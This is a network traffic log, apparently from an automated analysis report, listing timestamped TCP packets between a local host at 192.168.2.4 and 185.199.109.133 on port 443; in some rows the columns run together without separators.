Sep 26, 2024 12:16:23.556745052 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.556782007 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.556804895 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.556819916 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.556838989 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.562869072 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.562891960 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.562939882 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.562963963 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.562977076 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.562997103 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.563441992 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.563461065 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.563529015 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.563548088 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.563585997 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.564026117 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.564054966 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.564122915 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.564122915 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.564141989 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.564176083 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.564759970 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.564800024 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.564822912 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.564842939 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.564870119 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.564891100 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.645791054 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.645817995 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.645875931 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.645905972 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.645920038 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.645939112 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.658339024 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.658364058 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.658418894 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.658427000 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.658438921 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.658457041 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.658461094 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.658485889 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.658499002 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.658513069 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.658531904 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.659168005 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.659184933 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.659238100 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.659254074 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.659290075 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.660667896 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.660686016 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.660717010 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.660729885 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.660756111 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.660777092 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.660921097 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.660944939 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.660993099 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.660999060 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661032915 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.661179066 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661202908 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661258936 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.661264896 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661298037 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.661645889 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661662102 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661703110 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.661709070 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.661757946 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.736541033 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.736563921 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.736644983 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
                                                                    Sep 26, 2024 12:16:23.736673117 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.736716032 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.737037897 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.737063885 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.737090111 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.737096071 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.737123966 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.737143993 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.737952948 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.737974882 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.738038063 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.738043070 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.738095999 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.738656044 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.738672018 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.738723040 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.738729000 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.738770962 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.744163990 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.744191885 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.744252920 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.744278908 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.744297028 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.744326115 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.744601965 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.744621038 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.744669914 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.744677067 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.744704962 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.744728088 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.745106936 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.745125055 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.745176077 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.745182991 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.745218039 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.745734930 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.745750904 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.745800972 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.745805979 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.745850086 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.826917887 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.826951981 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.826999903 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827019930 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827045918 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827065945 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827140093 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827167988 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827189922 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827198982 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827219963 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827249050 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827673912 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827694893 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827730894 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827744961 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.827763081 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.827780962 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.828296900 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.828316927 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.828353882 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.828368902 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.828383923 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.828402042 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.834786892 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.834814072 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.834860086 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.834876060 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.834902048 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.834923983 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.835283041 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.835316896 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.835346937 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.835355043 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.835401058 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.835407019 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.835942030 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.835962057 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.835999012 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.836005926 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.836035967 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.836057901 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.836473942 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.836498022 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.836529970 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.836541891 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.836568117 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.836597919 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.917582035 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.917624950 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.917675018 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.917694092 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.917731047 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.917927027 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.917967081 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.918008089 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.918015957 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.918057919 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.918059111 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.918410063 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.918431997 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.918477058 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.918486118 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.918520927 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.918536901 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.919085026 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.919109106 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.919141054 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.919148922 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.919172049 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.919188023 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.925662994 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.925708055 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.925749063 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.925765038 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.925856113 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.925856113 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.926295042 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.926322937 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.926352978 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.926361084 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.926383018 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.926403046 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.927370071 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.927408934 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.927442074 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.927450895 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.927470922 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.927489042 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.927774906 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.927797079 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.927843094 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:23.927851915 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:23.927881956 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.008402109 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.008439064 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.008639097 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.008642912 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.008671045 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.008692980 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.008694887 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.008723974 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.008729935 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.008749962 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.008861065 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.009578943 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.009599924 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.009954929 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.009969950 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.010051012 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.010166883 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.010190010 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.010256052 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.010256052 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.010267019 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.010329008 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.016201973 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.016225100 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.016392946 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.016416073 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.016501904 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.016746044 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.016767025 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.016855001 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.016865969 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.016963959 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.017395973 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.017417908 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.017504930 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.017504930 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.017515898 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.017610073 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.017996073 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.018023014 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.018073082 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.018084049 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.018140078 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.098773003 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.098818064 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.098891973 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.098908901 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.098970890 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.098970890 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.099067926 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.099096060 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.099170923 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.099170923 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.099184036 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.099226952 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.099776983 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.099797964 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.099873066 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.099884033 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.099908113 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.099930048 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.100295067 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.100322962 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.100363016 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.100373030 CEST44349730185.199.109.133192.168.2.4
                                                                    Sep 26, 2024 12:16:24.100384951 CEST49730443192.168.2.4185.199.109.133
                                                                    Sep 26, 2024 12:16:24.100445032 CEST49730443192.168.2.4185.199.109.133
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 12:16:24.106537104 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.106574059 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.106657982 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.106658936 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.106676102 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.106837034 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.106899023 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.106933117 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.107002020 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.107002974 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.107012033 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.107140064 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.107770920 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.107794046 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.107870102 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.107870102 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.107882977 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.108067036 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.108088970 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.108098030 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.108117104 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.108129025 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.108228922 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.154732943 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.154810905 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.154915094 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.154937983 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.154944897 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.189948082 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.189980984 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.190082073 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.190109968 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.190165997 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Sep 26, 2024 12:16:24.190340042 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.190375090 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:24.190463066 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
